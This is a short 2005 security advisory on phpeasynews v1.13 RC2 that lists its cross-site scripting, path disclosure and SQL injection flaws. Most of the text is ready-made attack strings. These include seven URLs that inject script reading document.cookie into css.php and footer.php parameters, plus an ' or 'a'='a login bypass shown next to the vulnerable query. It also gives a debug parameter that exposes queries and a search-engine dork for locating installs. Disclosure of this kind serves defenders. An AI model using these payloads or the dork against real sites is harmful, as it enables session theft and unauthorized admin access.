Phpeasynews version 1.13 RC2 is susceptible to cross site scripting, path disclosure, and user check bypass vulnerabilities.
1bcd3c76f6565004ab00f136803cee930fa5730fb78ad311913b6ad2b14f5279
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-number">31/07/2005 0.17.53
phpeasynews v1.13 RC2 (possibly prior versions)
cross site scripting, path disclosure , user check bypass
author site:
http://www.brettjenkins.co.uk/
xss:
http://[target]/[path]/includes/css.php?css_tableheader=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_tablemain=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_na_writtenbyonat=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink_hover=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_version_number=<script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_website_url=<script>alert(document.cookie)</script><!--
path disclosure:
you can try to login with ' char to see full path of the application
user check bypass (sql injection):
if magic_quotes are off, you can always login with username: ' or 'a'='a
(at line 114, we have:
$query = "SELECT * FROM $PEN_DB_TABLE3 WHERE username = '$submittedusername'";
that become:
SELECT * FROM pen_users WHERE username = '' or 'a'='a'
always true...)
however you can not do the same with password, actually
so, one of the admin users, if created, can login as an invisibile user
named "'or 'a'='a"
or "'or isnull(1/0) or 'a'='a"
etc.
debug mode:
you can always see queries content calling $debug variabile, example:
http://[target]/[path]/admin.php?debug=1
googledork:
"Powered By: PHPeasynews"
author has been contacted
rgod
email: retrogod at aliceposta it
site: http://rgod.altervista.org
</span></span>
</code></pre>